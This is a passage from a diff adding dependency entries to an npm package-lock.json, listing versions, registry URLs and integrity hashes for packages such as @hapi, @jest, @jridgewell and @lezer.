"^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/storage/node_modules/mime": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-3.0.0.tgz", + "integrity": "sha512-jSCU7/VB1loIWBZe14aEYHU/+1UMEHoaO7qxCOVJOw9GgH72VAWppxNcjU+x9a2k3GSIBXNKxXQFqRvvZ7vr3A==", + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/retry-request": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-5.0.2.tgz", + "integrity": "sha512-wfI3pk7EE80lCIXprqh7ym48IHYdwmAAzESdbU8Q9l7pnRCk9LEhpbOTNKjz6FARLm/Bl5m+4F0ABxOkYUujSQ==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/teeny-request": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-8.0.2.tgz", + "integrity": "sha512-34pe0a4zASseXZCKdeTiIZqSKA8ETHb1EwItZr01PAR3CLPojeAKgSjzeNS4373gi59hNulyDrPKEbh2zO9sCg==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/teeny-request/node_modules/uuid": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.0.tgz", + "integrity": "sha512-MXcSTerfPa4uqyzStbRoTgt5XIe3x5+42+q1sDuy3R5MDk66URdLMOZe5aPX/SQd+kuYAh0FdP/pO28IkQyTeg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/storage/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/storage/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@grpc/grpc-js": { + "version": "1.8.22", + "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.8.22.tgz", + "integrity": "sha512-oAjDdN7fzbUi+4hZjKG96MR6KTEubAeMpQEb+77qy+3r0Ua5xTFuie6JOLr4ZZgl5g+W5/uRTS2M1V8mVAFPuA==", + "dependencies": { + "@grpc/proto-loader": "^0.7.0", + "@types/node": ">=12.12.47" + }, + "engines": { + "node": "^8.13.0 || >=10.10.0" + } + }, + "node_modules/@grpc/proto-loader": { + "version": "0.7.13", + "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.13.tgz", + "integrity": "sha512-AiXO/bfe9bmxBjxxtYxFAXGZvMaN5s8kO+jBHAJCON8rJoB5YS/D6X7ZNc6XQkuHNmyl4CYaMI1fJ/Gn27RGGw==", + "dependencies": { + "lodash.camelcase": "^4.3.0", + "long": "^5.0.0", + "protobufjs": "^7.2.5", + "yargs": "^17.7.2" + }, + "bin": { + "proto-loader-gen-types": "build/bin/proto-loader-gen-types.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/@gulpjs/to-absolute-glob": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@gulpjs/to-absolute-glob/-/to-absolute-glob-4.0.0.tgz", + "integrity": "sha512-kjotm7XJrJ6v+7knhPaRgaT6q8F8K2jiafwYdNHLzmV0uGLuZY43FK6smNSHUPrhq5kX2slCUy+RGG/xGqmIKA==", + "dev": true, + "dependencies": { + "is-negated-glob": "^1.0.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/@hapi/b64": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@hapi/b64/-/b64-5.0.0.tgz", + "integrity": "sha512-ngu0tSEmrezoiIaNGG6rRvKOUkUuDdf4XTPnONHGYfSGRmDqPZX5oJL6HAdKTo1UQHECbdB4OzhWrfgVppjHUw==", + "dependencies": { + "@hapi/hoek": "9.x.x" + } + }, + "node_modules/@hapi/boom": { + "version": "9.1.4", + "resolved": "https://registry.npmjs.org/@hapi/boom/-/boom-9.1.4.tgz", + "integrity": "sha512-Ls1oH8jaN1vNsqcaHVYJrKmgMcKsC1wcp8bujvXrHaAqD2iDYq3HoOwsxwo09Cuda5R5nC0o0IxlrlTuvPuzSw==", + "dependencies": { + "@hapi/hoek": "9.x.x" + } + }, + "node_modules/@hapi/cryptiles": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@hapi/cryptiles/-/cryptiles-5.1.0.tgz", + "integrity": "sha512-fo9+d1Ba5/FIoMySfMqPBR/7Pa29J2RsiPrl7bkwo5W5o+AN1dAYQRi4SPrPwwVxVGKjgLOEWrsvt1BonJSfLA==", + "dependencies": { + "@hapi/boom": "9.x.x" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@hapi/hoek": { + "version": "9.3.0", + "resolved": "https://registry.npmjs.org/@hapi/hoek/-/hoek-9.3.0.tgz", + "integrity": "sha512-/c6rf4UJlmHlC9b5BaNvzAcFv7HZ2QHaV0D4/HNlBdvFnvQq8RI4kYdhyPCl7Xj+oWvTWQ8ujhqS53LIgAe6KQ==" + }, + "node_modules/@hapi/iron": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/@hapi/iron/-/iron-6.0.0.tgz", + "integrity": "sha512-zvGvWDufiTGpTJPG1Y/McN8UqWBu0k/xs/7l++HVU535NLHXsHhy54cfEMdW7EjwKfbBfM9Xy25FmTiobb7Hvw==", + "dependencies": { + "@hapi/b64": "5.x.x", + "@hapi/boom": "9.x.x", + "@hapi/bourne": "2.x.x", + "@hapi/cryptiles": "5.x.x", + "@hapi/hoek": "9.x.x" + } + }, + "node_modules/@hapi/iron/node_modules/@hapi/bourne": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@hapi/bourne/-/bourne-2.1.0.tgz", + "integrity": "sha512-i1BpaNDVLJdRBEKeJWkVO6tYX6DMFBuwMhSuWqLsY4ufeTKGVuV5rBsUhxPayXqnnWHgXUAmWK16H/ykO5Wj4Q==" + }, + "node_modules/@hapi/podium": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/@hapi/podium/-/podium-4.1.3.tgz", + "integrity": "sha512-ljsKGQzLkFqnQxE7qeanvgGj4dejnciErYd30dbrYzUOF/FyS/DOF97qcrT3bhoVwCYmxa6PEMhxfCPlnUcD2g==", + "dependencies": { + "@hapi/hoek": "9.x.x", + "@hapi/teamwork": "5.x.x", + "@hapi/validate": "1.x.x" + } + }, + "node_modules/@hapi/teamwork": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@hapi/teamwork/-/teamwork-5.1.1.tgz", + "integrity": "sha512-1oPx9AE5TIv+V6Ih54RP9lTZBso3rP8j4Xhb6iSVwPXtAM+sDopl5TFMv5Paw73UnpZJ9gjcrTE1BXrWt9eQrg==", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@hapi/topo": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@hapi/topo/-/topo-5.1.0.tgz", + "integrity": "sha512-foQZKJig7Ob0BMAYBfcJk8d77QtOe7Wo4ox7ff1lQYoNNAb6jwcY1ncdoy2e9wQZzvNy7ODZCYJkK8kzmcAnAg==", + "dependencies": { + "@hapi/hoek": "^9.0.0" + } + }, + "node_modules/@hapi/validate": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/@hapi/validate/-/validate-1.1.3.tgz", + "integrity": "sha512-/XMR0N0wjw0Twzq2pQOzPBZlDzkekGcoCtzO314BpIEsbXdYGthQUbxgkGDf4nhk1+IPDAsXqWjMohRQYO06UA==", + "dependencies": { + "@hapi/hoek": "^9.0.0", + "@hapi/topo": "^5.0.0" + } + }, + "node_modules/@hapi/wreck": { + "version": "18.0.1", + "resolved": "https://registry.npmjs.org/@hapi/wreck/-/wreck-18.0.1.tgz", + "integrity": "sha512-OLHER70+rZxvDl75xq3xXOfd3e8XIvz8fWY0dqg92UvhZ29zo24vQgfqgHSYhB5ZiuFpSLeriOisAlxAo/1jWg==", + "dependencies": { + "@hapi/boom": "^10.0.1", + "@hapi/bourne": "^3.0.0", + "@hapi/hoek": "^11.0.2" + } + }, + "node_modules/@hapi/wreck/node_modules/@hapi/boom": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/@hapi/boom/-/boom-10.0.1.tgz", + "integrity": "sha512-ERcCZaEjdH3OgSJlyjVk8pHIFeus91CjKP3v+MpgBNp5IvGzP2l/bRiD78nqYcKPaZdbKkK5vDBVPd2ohHBlsA==", + "dependencies": { + "@hapi/hoek": "^11.0.2" + } + }, + "node_modules/@hapi/wreck/node_modules/@hapi/bourne": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@hapi/bourne/-/bourne-3.0.0.tgz", + "integrity": "sha512-Waj1cwPXJDucOib4a3bAISsKJVb15MKi9IvmTI/7ssVEm6sywXGjVJDhl6/umt1pK1ZS7PacXU3A1PmFKHEZ2w==" + }, + "node_modules/@hapi/wreck/node_modules/@hapi/hoek": { + "version": "11.0.2", + "resolved": "https://registry.npmjs.org/@hapi/hoek/-/hoek-11.0.2.tgz", + "integrity": "sha512-aKmlCO57XFZ26wso4rJsW4oTUnrgTFw2jh3io7CAtO9w4UltBNwRXvXIVzzyfkaaLRo3nluP/19msA8vDUUuKw==" + }, + "node_modules/@humanwhocodes/config-array": { + "version": "0.11.14", + "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.14.tgz", + "integrity": "sha512-3T8LkOmg45BV5FICb15QQMsyUSWrQ8AygVfC7ZG32zOalnqrilm018ZVCw0eapXux8FtA33q8PSRSstjee3jSg==", + "dependencies": { + "@humanwhocodes/object-schema": "^2.0.2", + "debug": "^4.3.1", + "minimatch": "^3.0.5" + }, + "engines": { + "node": ">=10.10.0" + } + }, + "node_modules/@humanwhocodes/config-array/node_modules/@humanwhocodes/object-schema": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-2.0.3.tgz", + "integrity": "sha512-93zYdMES/c1D69yZiKDBj0V24vqNzB/koF26KPaagAfd3P/4gUlh3Dys5ogAK+Exi9QyzlD8x/08Zt7wIKcDcA==" + }, + "node_modules/@humanwhocodes/module-importer": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@humanwhocodes/module-importer/-/module-importer-1.0.1.tgz", + "integrity": "sha512-bxveV4V8v5Yb4ncFTT3rPSgZBOpCkjfK0y4oVVVJwIuDVBRMDXrPyXRL988i5ap9m9bnyEEjWfm5WkBmtffLfA==", + "engines": { + "node": ">=12.22" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/nzakas" + } + }, + "node_modules/@humanwhocodes/object-schema": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.1.tgz", + "integrity": "sha512-ZnQMnLV4e7hDlUvw8H+U8ASL02SS2Gn6+9Ac3wGGLIe7+je2AeAOxPY+izIPJDfFDb7eDjev0Us8MO1iFRN8hA==", + "dev": true + }, + "node_modules/@icons/material": { + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/@icons/material/-/material-0.2.4.tgz", + "integrity": "sha512-QPcGmICAPbGLGb6F/yNf/KzKqvFx8z5qx3D1yFqVAjoFmXK35EgyW+cJ57Te3CNsmzblwtzakLGFqHPqrfb4Tw==", + "dev": true, + "peerDependencies": { + "react": "*" + } + }, + "node_modules/@ioredis/commands": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@ioredis/commands/-/commands-1.2.0.tgz", + "integrity": "sha512-Sx1pU8EM64o2BrqNpEO1CNLtKQwyhuXuqyfH7oGKCk+1a33d2r5saW8zNwm3j6BTExtjrv2BxTgzzkMwts6vGg==", + "license": "MIT" + }, + "node_modules/@isaacs/cliui": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", + "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", + "dev": true, + "dependencies": { + "string-width": "^5.1.2", + "string-width-cjs": "npm:string-width@^4.2.0", + "strip-ansi": "^7.0.1", + "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", + "wrap-ansi": "^8.1.0", + "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@isaacs/cliui/node_modules/ansi-regex": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.0.1.tgz", + "integrity": "sha512-n5M855fKb2SsfMIiFFoVrABHJC8QtHwVx+mHWP3QcEqBHYienj5dHSgjbxtC0WEZXYt4wcD6zrQElDPhFuZgfA==", + "dev": true, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/ansi-regex?sponsor=1" + } + }, + "node_modules/@isaacs/cliui/node_modules/ansi-styles": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", + "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", + "dev": true, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@isaacs/cliui/node_modules/emoji-regex": { + "version": "9.2.2", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", + "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==", + "dev": true + }, + "node_modules/@isaacs/cliui/node_modules/string-width": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", + "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", + "dev": true, + "dependencies": { + "eastasianwidth": "^0.2.0", + "emoji-regex": "^9.2.2", + "strip-ansi": "^7.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@isaacs/cliui/node_modules/strip-ansi": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", + "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", + "dev": true, + "dependencies": { + "ansi-regex": "^6.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/strip-ansi?sponsor=1" + } + }, + "node_modules/@isaacs/cliui/node_modules/wrap-ansi": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", + "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", + "dev": true, + "dependencies": { + "ansi-styles": "^6.1.0", + "string-width": "^5.0.1", + "strip-ansi": "^7.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, + "node_modules/@isomorphic-git/idb-keyval": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/@isomorphic-git/idb-keyval/-/idb-keyval-3.3.2.tgz", + "integrity": "sha512-r8/AdpiS0/WJCNR/t/gsgL+M8NMVj/ek7s60uz3LmpCaTF2mEVlZJlB01ZzalgYzRLXwSPC92o+pdzjM7PN/pA==", + "dev": true, + "license": "Apache-2.0" + }, + "node_modules/@isomorphic-git/lightning-fs": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/@isomorphic-git/lightning-fs/-/lightning-fs-4.6.0.tgz", + "integrity": "sha512-tfon8f1h6LawjFI/d8lZPWRPTxmdvyTMbkT/j5yo6dB0hALhKw5D9JsdCcUu/D1pAcMMiU7GZFDsDGqylerr7g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@isomorphic-git/idb-keyval": "3.3.2", + "isomorphic-textencoder": "1.0.1", + "just-debounce-it": "1.1.0", + "just-once": "1.1.0" + }, + "bin": { + "superblocktxt": "src/superblocktxt.js" + } + }, + "node_modules/@istanbuljs/schema": { + "version": "0.1.3", + "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", + "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@jest/schemas": { + "version": "29.6.3", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", + "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", + "dev": true, + "dependencies": { + "@sinclair/typebox": "^0.27.8" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, + "node_modules/@jest/types": { + "version": "29.6.3", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", + "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", + "dev": true, + "dependencies": { + "@jest/schemas": "^29.6.3", + "@types/istanbul-lib-coverage": "^2.0.0", + "@types/istanbul-reports": "^3.0.0", + "@types/node": "*", + "@types/yargs": "^17.0.8", + "chalk": "^4.0.0" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, + "node_modules/@jest/types/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@jest/types/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@jest/types/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@jridgewell/gen-mapping": { + "version": "0.3.5", + "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", + "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", + "dev": true, + "dependencies": { + "@jridgewell/set-array": "^1.2.1", + "@jridgewell/sourcemap-codec": "^1.4.10", + "@jridgewell/trace-mapping": "^0.3.24" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/resolve-uri": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", + "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", + "dev": true, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/set-array": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", + "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", + "dev": true, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/source-map": { + "version": "0.3.6", + "resolved": "https://registry.npmjs.org/@jridgewell/source-map/-/source-map-0.3.6.tgz", + "integrity": "sha512-1ZJTZebgqllO79ue2bm3rIGud/bOe0pP5BjSRCRxxYkEZS8STV7zN84UBbiYu7jy+eCKSnVIUgoWWE/tt+shMQ==", + "dev": true, + "dependencies": { + "@jridgewell/gen-mapping": "^0.3.5", + "@jridgewell/trace-mapping": "^0.3.25" + } + }, + "node_modules/@jridgewell/sourcemap-codec": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.0.tgz", + "integrity": "sha512-gv3ZRaISU3fjPAgNsriBRqGWQL6quFx04YMPW/zD8XMLsU32mhCCbfbO6KZFLjvYpCZ8zyDEgqsgf+PwPaM7GQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@jridgewell/trace-mapping": { + "version": "0.3.25", + "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", + "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", + "dev": true, + "dependencies": { + "@jridgewell/resolve-uri": "^3.1.0", + "@jridgewell/sourcemap-codec": "^1.4.14" + } + }, + "node_modules/@js-sdsl/ordered-map": { + "version": "4.4.2", + "resolved": "https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz", + "integrity": "sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/js-sdsl" + } + }, + "node_modules/@jsdevtools/ono": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/@jsdevtools/ono/-/ono-7.1.3.tgz", + "integrity": "sha512-4JQNk+3mVzK3xh2rqd6RB4J46qUR19azEHBneZyTZM+c456qOrbbM/5xcR8huNCCcbVt7+UmizG6GuUvPvKUYg==" + }, + "node_modules/@jsdoc/salty": { + "version": "0.2.8", + "resolved": "https://registry.npmjs.org/@jsdoc/salty/-/salty-0.2.8.tgz", + "integrity": "sha512-5e+SFVavj1ORKlKaKr2BmTOekmXbelU7dC0cDkQLqag7xfuTPuGMUFx7KWJuv4bYZrTsoL2Z18VVCOKYxzoHcg==", + "dependencies": { + "lodash": "^4.17.21" + }, + "engines": { + "node": ">=v12.0.0" + } + }, + "node_modules/@jsonjoy.com/base64": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@jsonjoy.com/base64/-/base64-1.1.2.tgz", + "integrity": "sha512-q6XAnWQDIMA3+FTiOYajoYqySkO+JSat0ytXGSuRdq9uXE7o92gzuQwQM14xaCRlBLGq3v5miDGC4vkVTn54xA==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=10.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + }, + "peerDependencies": { + "tslib": "2" + } + }, + "node_modules/@jsonjoy.com/json-pack": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@jsonjoy.com/json-pack/-/json-pack-1.2.0.tgz", + "integrity": "sha512-io1zEbbYcElht3tdlqEOFxZ0dMTYrHz9iMf0gqn1pPjZFTCgM5R4R5IMA20Chb2UPYYsxjzs8CgZ7Nb5n2K2rA==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@jsonjoy.com/base64": "^1.1.1", + "@jsonjoy.com/util": "^1.1.2", + "hyperdyperid": "^1.2.0", + "thingies": "^1.20.0" + }, + "engines": { + "node": ">=10.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + }, + "peerDependencies": { + "tslib": "2" + } + }, + "node_modules/@jsonjoy.com/util": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/@jsonjoy.com/util/-/util-1.5.0.tgz", + "integrity": "sha512-ojoNsrIuPI9g6o8UxhraZQSyF2ByJanAY4cTFbc8Mf2AXEF4aQRGY1dJxyJpuyav8r9FGflEt/Ff3u5Nt6YMPA==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=10.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + }, + "peerDependencies": { + "tslib": "2" + } + }, + "node_modules/@juggle/resize-observer": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/@juggle/resize-observer/-/resize-observer-3.3.1.tgz", + "integrity": "sha512-zMM9Ds+SawiUkakS7y94Ymqx+S0ORzpG3frZirN3l+UlXUmSUR7hF4wxCVqW+ei94JzV5kt0uXBcoOEAuiydrw==", + "dev": true + }, + "node_modules/@leichtgewicht/ip-codec": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@leichtgewicht/ip-codec/-/ip-codec-2.0.5.tgz", + "integrity": "sha512-Vo+PSpZG2/fmgmiNzYK9qWRh8h/CHrwD0mo1h1DzL4yzHNSfWYujGTYsWGreD000gcgmZ7K4Ys6Tx9TxtsKdDw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@lezer/common": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/@lezer/common/-/common-1.2.3.tgz", + "integrity": "sha512-w7ojc8ejBqr2REPsWxJjrMFsA/ysDCFICn8zEOR9mrqzOu2amhITYuLD8ag6XZf0CFXDrhKqw7+tW8cX66NaDA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@lezer/css": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/@lezer/css/-/css-1.0.0.tgz", + "integrity": "sha512-616VqgDKumHmYIuxs3tnX1irEQmoDHgF/TlP4O5ICWwyHwLMErq+8iKVuzTkOdBqvYAVmObqThcDEAaaMJjAdg==", + "dev": true, + "dependencies": { + "@lezer/highlight": "^1.0.0", + "@lezer/lr": "^1.0.0" + } + }, + "node_modules/@lezer/generator": { + "version": "1.7.1", + "resolved": "https://registry.npmjs.org/@lezer/generator/-/generator-1.7.1.tgz", + "integrity": "sha512-MgPJN9Si+ccxzXl3OAmCeZuUKw4XiPl4y664FX/hnnyG9CTqUPq65N3/VGPA2jD23D7QgMTtNqflta+cPN+5mQ==", + "dev": true, + "dependencies": { + "@lezer/common": "^1.1.0", + "@lezer/lr": "^1.3.0" + }, + "bin": { + "lezer-generator": "src/lezer-generator.cjs" + } + }, + "node_modules/@lezer/highlight": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/@lezer/highlight/-/highlight-1.2.1.tgz", + "integrity": "sha512-Z5duk4RN/3zuVO7Jq0pGLJ3qynpxUVsh7IbUbGj88+uV2ApSAn6kWg2au3iJb+0Zi7kKtqffIESgNcRXWZWmSA==", + "dev": true, + "dependencies": { + "@lezer/common": "^1.0.0" + } + }, + "node_modules/@lezer/html": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/@lezer/html/-/html-1.0.0.tgz", + "integrity": "sha512-wZHBcieArLTxEi198hqRBBHMySzDKo5suWaESdUw0t44IXp01vkSRwX2brG1qBbKdwJ+C6U0iMl00vWNiyAROg==", + "dev": true, + "dependencies": { + "@lezer/highlight": "^1.0.0", + "@lezer/lr": "^1.0.0" + } + }, + "node_modules/@lezer/javascript": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@lezer/javascript/-/javascript-1.0.1.tgz", + "integrity": 